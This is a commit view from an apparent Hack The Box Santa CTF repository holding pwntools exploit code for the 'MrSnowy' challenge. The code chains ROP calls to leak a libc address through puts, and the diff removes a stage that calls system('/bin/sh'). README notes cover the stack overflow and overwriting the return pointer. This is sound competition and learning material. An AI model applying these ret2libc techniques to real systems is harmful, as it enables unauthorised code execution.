aaron/htb-santa-ctf
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

add exploit script

Browse Source
This commit is contained in:
aaron
2021-12-08 01:13:35 +01:00
parent ec623b0aaa
commit 3365ce2c4e
10 changed files with 67 additions and 24 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
pwn/mrsnowy/.gdb_history Normal file
View File

@@ -0,0 +1,3 @@
stack
r
quit

25
pwn/mrsnowy/kabuttmache.py
View File

@@ -17,7 +17,7 @@ def do_read():
rop = ROP(elf)
rop.call(elf.symbols['puts'], [elf.got['puts']])
rop.call(elf.symbols['investigate'])
rop.call(elf.symbols['deactivate_camera'])
# assemble payload
payload = [
@@ -32,28 +32,5 @@ do_read()
# send payload
p.sendline(b''.join(payload))
puts = u64(p.recvuntil(b'\n').rstrip().ljust(8, b'\x00'))
log.info(f'puts found at {hex(puts)}')
# Note:
# libc database search for puts address: 0x6d31333b315b1b20
# -> libc6_2.19-18+deb8u10_i386
# -> https://libc.blukat.me/d/libc6_2.19-18+deb8u10_i386.so
libc = ELF("libc6_2.19-18+deb8u10_i386.so")
libc.address = puts - libc.symbols["puts"]
log.info(f'libc base address determined {hex(libc.address)}')
rop = ROP(libc)
rop.call('puts', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('system', [ next(libc.search(b'/bin/sh\x00')) ])
rop.call('exit')
# assemble payload
payload = [
b'\xAA'*offset,
rop.chain()
]
p.sendline(b''.join(payload))
p.interactive()

BIN
pwn/mrsnowy/mr_snowy
View File

Binary file not shown.

0
pwn/mrsnowy/Pipfile → pwn/mrsnowy/mrsnowy.bak/Pipfile
View File

0
pwn/mrsnowy/Pipfile.lock → pwn/mrsnowy/mrsnowy.bak/Pipfile.lock generated
View File

63
pwn/mrsnowy/mrsnowy.bak/README.md Normal file
View File

@@ -0,0 +1,63 @@
# MrSnowy
There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
Something must be wrong with him.
## Flag
Not pwned
## Progress so far
![vulnerable function](images/investigate.png)
- The `read()` reads 0x108 bytes of input from stdin
- The buffer is uninitialized
- The functioncall sits at `*investigate+67`
- The Stackframe of the function only has a size of 0x40 bytes
- `checksec --file=mrsnowy` reports NX being enabled
- So no shellcode will be placable unless there is executable space
- This hints to ROP Chaining
![dissasembly of investigate function](images/investigate_disass.png)
- The binary should be patched to get rid of the timetaking animation
- Just `nop` the banner() function call using radare2
- Overwriting the returnpointer of `investigate()` using pwntools:
```python
context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)
# read banner and stuff until input is requested
def do_read():
while True:
ll = p.read()
print(ll)
if b'>' in ll:
break
# if not patched wait for the animation and send 1
do_read()
p.sendline('1')
do_read()
# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))
# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```
- Trying to find ROP Gadgets using pwntools
```python
e = ELF("mr_snowy")
rop = ROP(elf)
rop.rbx
rop.gadgets
```

0
pwn/mrsnowy/core → pwn/mrsnowy/mrsnowy.bak/core
View File

BIN
pwn/mrsnowy/mrsnowy.bak/mr_snowy Executable file
View File

Binary file not shown.

0
pwn/mrsnowy/pwn.py → pwn/mrsnowy/mrsnowy.bak/pwn.py
View File

0
pwn/mrsnowy/target → pwn/mrsnowy/mrsnowy.bak/target
View File